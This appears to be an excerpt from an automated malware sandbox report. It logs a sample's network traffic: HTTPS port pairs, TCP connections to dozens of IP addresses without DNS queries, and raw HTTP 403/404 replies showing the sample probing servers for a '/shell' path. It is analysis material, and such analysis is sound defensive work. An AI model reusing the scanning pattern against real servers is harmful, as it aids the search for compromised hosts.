      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 34650
      Source: unknownNetwork traffic detected: HTTP traffic on port 48506 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54264
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54262
      Source: unknownNetwork traffic detected: HTTP traffic on port 57992 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 44218 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 47956
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60934
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 42266
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 43596
      Source: unknownNetwork traffic detected: HTTP traffic on port 54262 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 43460 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 42264
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 33308
      Source: unknownNetwork traffic detected: HTTP traffic on port 33846 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 43890 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60948
      Source: unknownNetwork traffic detected: HTTP traffic on port 56328 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 33302
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58624
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54272
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 46616
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 46612
      Source: unknownNetwork traffic detected: HTTP traffic on port 46050 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 47944
      Source: unknownNetwork traffic detected: HTTP traffic on port 36018 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 42462 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 42032 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 46914 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 34628
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 35956
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59964
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58640
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 35960
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58642
      Source: unknownNetwork traffic detected: HTTP traffic on port 58280 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 46608
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60956
      Source: unknownNetwork traffic detected: HTTP traffic on port 56982 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57318
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 34614
      Source: unknownNetwork traffic detected: HTTP traffic on port 39428 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54288
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 34612
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57316
      Source: unknownNetwork traffic detected: HTTP traffic on port 41452 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54298
      Source: unknownNetwork traffic detected: HTTP traffic on port 58308 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 42232
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 43564
      Source: unknownNetwork traffic detected: HTTP traffic on port 38694 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 37242 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 45342
      Source: unknownNetwork traffic detected: HTTP traffic on port 59842 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50296 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 33358
      Source: unknownNetwork traffic detected: HTTP traffic on port 44658 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56882
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51190
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 34692
      Source: unknownNetwork traffic detected: HTTP traffic on port 51994 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 36114 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 46668
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 46666
      Source: unknownNetwork traffic detected: HTTP traffic on port 44472 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 45332
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59914
      Source: unknownTCP traffic detected without corresponding DNS query: 193.207.201.19
      Source: unknownTCP traffic detected without corresponding DNS query: 202.17.136.138
      Source: unknownTCP traffic detected without corresponding DNS query: 94.218.188.212
      Source: unknownTCP traffic detected without corresponding DNS query: 160.122.30.19
      Source: unknownTCP traffic detected without corresponding DNS query: 49.181.147.171
      Source: unknownTCP traffic detected without corresponding DNS query: 105.114.20.237
      Source: unknownTCP traffic detected without corresponding DNS query: 169.3.196.145
      Source: unknownTCP traffic detected without corresponding DNS query: 37.107.43.78
      Source: unknownTCP traffic detected without corresponding DNS query: 42.202.24.61
      Source: unknownTCP traffic detected without corresponding DNS query: 202.46.125.187
      Source: unknownTCP traffic detected without corresponding DNS query: 48.238.70.229
      Source: unknownTCP traffic detected without corresponding DNS query: 66.192.212.214
      Source: unknownTCP traffic detected without corresponding DNS query: 201.248.234.52
      Source: unknownTCP traffic detected without corresponding DNS query: 67.143.33.145
      Source: unknownTCP traffic detected without corresponding DNS query: 151.72.96.34
      Source: unknownTCP traffic detected without corresponding DNS query: 168.141.39.254
      Source: unknownTCP traffic detected without corresponding DNS query: 168.61.180.41
      Source: unknownTCP traffic detected without corresponding DNS query: 149.26.196.221
      Source: unknownTCP traffic detected without corresponding DNS query: 109.97.31.10
      Source: unknownTCP traffic detected without corresponding DNS query: 153.128.123.191
      Source: unknownTCP traffic detected without corresponding DNS query: 119.203.177.173
      Source: unknownTCP traffic detected without corresponding DNS query: 119.228.96.47
      Source: unknownTCP traffic detected without corresponding DNS query: 137.233.130.94
      Source: unknownTCP traffic detected without corresponding DNS query: 141.248.15.220
      Source: unknownTCP traffic detected without corresponding DNS query: 65.8.177.199
      Source: unknownTCP traffic detected without corresponding DNS query: 73.137.97.137
      Source: unknownTCP traffic detected without corresponding DNS query: 156.51.54.181
      Source: unknownTCP traffic detected without corresponding DNS query: 172.149.3.84
      Source: unknownTCP traffic detected without corresponding DNS query: 140.247.251.105
      Source: unknownTCP traffic detected without corresponding DNS query: 222.214.187.210
      Source: unknownTCP traffic detected without corresponding DNS query: 209.174.193.196
      Source: unknownTCP traffic detected without corresponding DNS query: 191.38.32.186
      Source: unknownTCP traffic detected without corresponding DNS query: 8.105.235.85
      Source: unknownTCP traffic detected without corresponding DNS query: 197.147.196.71
      Source: unknownTCP traffic detected without corresponding DNS query: 119.167.82.28
      Source: unknownTCP traffic detected without corresponding DNS query: 133.65.193.90
      Source: unknownTCP traffic detected without corresponding DNS query: 73.112.40.30
      Source: unknownTCP traffic detected without corresponding DNS query: 94.109.3.189
      Source: unknownTCP traffic detected without corresponding DNS query: 158.102.123.111
      Source: unknownTCP traffic detected without corresponding DNS query: 73.240.191.187
      Source: unknownTCP traffic detected without corresponding DNS query: 84.56.8.90
      Source: unknownTCP traffic detected without corresponding DNS query: 153.40.83.141
      Source: unknownTCP traffic detected without corresponding DNS query: 158.211.109.128
      Source: unknownTCP traffic detected without corresponding DNS query: 23.143.228.231
      Source: unknownTCP traffic detected without corresponding DNS query: 9.249.143.68
      Source: unknownTCP traffic detected without corresponding DNS query: 17.1.102.221
      Source: unknownTCP traffic detected without corresponding DNS query: 186.175.32.76
      Source: unknownTCP traffic detected without corresponding DNS query: 131.53.16.92
      Source: unknownTCP traffic detected without corresponding DNS query: 195.175.252.174
      Source: unknownTCP traffic detected without corresponding DNS query: 194.98.0.75
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 19 Jul 2022 11:07:00 GMTServer: CoruscantX-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffLast-Modified: Mon, 16 Nov 2020 16:20:01 GMTETag: "3ef-5b43bc0111f5a"Accept-Ranges: bytesContent-Length: 1007Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 61 6d 50 6f 72 74 61 6c 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 2f 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 20 31 35 30 70 78 20 61 75 74 6f 3b 20 77 69 64 74 68 3a 20 35 30 30 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 22 3e 0a 09 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 35 30 70 78 3b 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 35 30 70 78 3b 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 43 43 43 3b 22 3e 0a 09 09 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 36 70 78 3b 22 3e 50 61 67 69 6e 61 20 6e 6f 6e 20 74 72 6f 76 61 74 61 3c 2f 73 70 61 6e 3e 3c 62 72 20 2f 3e 0a 09 09 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 33 70 78 3b 20 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 22 3e 54 6f 72 6e 61 20 61 6c 6c 61 20 3c 61 20 68 72 65 66 3d 22 2f 22 20 74 61 72 67 65 74 3d 22 5f 74 6f 70 22 3e 70 61 67 69 6e 61 20 69 6e 69 7a 69 61 6c 65 3c 2f 61 3e 20 72 69 63 61 72 69 63 61 6e 64 6f 20 74 75 74 74 6f 20 69 6c 20 63 6f 6e 74 65 6e 75 74 6f 3c 2f 73 70 61 6e 3e 0a 09 20 20 20 20 3c 2f 64 69 76 3e 0a 09 20 20 20 20 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 36 70 78 3b 22 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 73 70 61 6e 3e 3c 62 72 20 2f 3e 0a 09 20 20 20 20 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 33 70 78 3b 20 63 6f 6c 6f 72 3a 20 23
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 19 Jul 2022 11:07:00 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 19 Jul 2022 11:07:00 GMTServer: ApacheContent-Length: 326Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 73 68 65 6c 6c 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /shellon this server.</p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 19 Jul 2022 11:07:00 GMTServer: Apache/2.4.51 (Unix) OpenSSL/1.1.1nContent-Length: 196Keep-Alive: timeout=2, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 19 Jul 2022 11:07:00 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Found on AcceleratorDate: Tue, 19 Jul 2022 11:07:00 GMTConnection: keep-aliveVia: http/1.1 ussjc2-edge-bx-017.ts.apple.com (acdn/36.13980)Cache-Control: no-storeContent-Type: text/htmlContent-Language: enX-Cache: noneCDNUUID: e6b29892-794b-4397-a108-b364d0baab02-5491100004Content-Length: 287Data Raw: 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 20 6f 6e 20 41 63 63 65 6c 65 72 61 74 6f 72 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 77 68 69 74 65 22 20 46 47 43 4f 4c 4f 52 3d 22 62 6c 61 63 6b 22 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 20 6f 6e 20 41 63 63 65 6c 65 72 61 74 6f 72 3c 2f 48 31 3e 0a 3c 48 52 3e 0a 0a 3c 46 4f 4e 54 20 46 41 43 45 3d 22 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 22 3e 3c 42 3e 0a 44 65 73 63 72 69 70 74 69 6f 6e 3a 20 59 6f 75 72 20 72 65 71 75 65 73 74 20 6f 6e 20 74 68 65 20 68 6f 73 74 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 43 68 65 63 6b 20 74 68 65 20 6c 6f 63 61 74 69 6f 6e 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 0a 3c 2f 42 3e 3c 2f 46 4f 4e 54 3e 0a 3c 48 52 3e 0a 3c 2f 42 4f 44 59 3e 0a Data Ascii: <HTML><HEAD><TITLE>Not Found on Accelerator</TITLE></HEAD><BODY BGCOLOR="white" FGCOLOR="black"><H1>Not Found on Accelerator</H1><HR><FONT FACE="Helvetica,Arial"><B>Description: Your request on the host was not found.Check the location and try again.</B></FONT><HR></BODY>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 19 Jul 2022 11:07:00 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 1635Content-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETDate: Tue, 19 Jul 2022 11:07:11 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 57 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0d 0a 3c 53 54 59 4c 45 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 42 4f 44 59 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 31 20 7b 20 66 6f 6e 74 3a 20 31 33 70 74 2f 31 35 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 32 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 41 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 72 65 64 20 7d 0d 0a 20 20 41 3a 76 69 73 69 74 65 64 20 7b 20 63 6f 6c 6f 72 3a 20 6d 61 72 6f 6f 6e 20 7d 0d 0a 3c 2f 53 54 59 4c 45 3e 0d 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 3c 54 41 42 4c 45 20 77 69 64 74 68 3d 35 30 30 20 62 6f 72 64 65 72 3d 30 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 31 30 3e 3c 54 52 3e 3c 54 44 3e 0d 0a 0d 0a 3c 68 31 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e 50 6c 65 61 73 65 20 74 72 79 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 3a 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c 69 3e 4d 61 6b 65 20 73 75 72 65 20 74 68 61 74 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 64 72 65 73 73 20 64 69 73 70 6c 61 79 65 64 20 69 6e 20 74 68 65 20 61 64 64 72 65 73 73 20 62 61 72 20 6f 66 20 79 6f 75 72 20 62 72 6f 77 73 65 72 20 69 73 20 73 70 65 6c 6c 65 64 20 61 6e 64 20 66 6f 72 6d 61 74 74 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 49 66 20 79 6f 75 20 72 65 61 63 68 65 64 20 74 68 69 73 20 70 61 67 65 20 62 79 20 63 6c 69 63 6b 69 6e 67 20 61 20 6c 69 6e 6b 2c 20 63 6f 6e 74 61 63 74 0d 0a 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 74 6f 20 61 6c 65 72 74 20 74 68 65 6d 20 74 68 61 74 20 74 68 65 20 6c 69 6e 6b 20 69 73 20 69 6e 63 6f 72 72 65 63 74 6c 79 20 66 6f 72 6d 61 74 74 65 64 2e 0d 0a 3c 2f 6c 69 3e 0d 0a
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 19 Jul 2022 11:07:01 GMTServer: Apache/2.2.22 (Ubuntu)Vary: Accept-EncodingContent-Length: 278Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 32 2e 32 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p><hr><address>Apache/2.2.22 (Ubuntu) Server at 127.0.0.1 Port 80</address></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 19 Jul 2022 12:14:54 GMTServer: webserverX-Frame-Options: SAMEORIGINContent-Length: 181Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=10, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6c 6f 63 61 74 65 20 64 6f 63 75 6d 65 6e 74 3a 20 2f 73 68 65 6c 6c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't locate document: /shell</p></body></html>
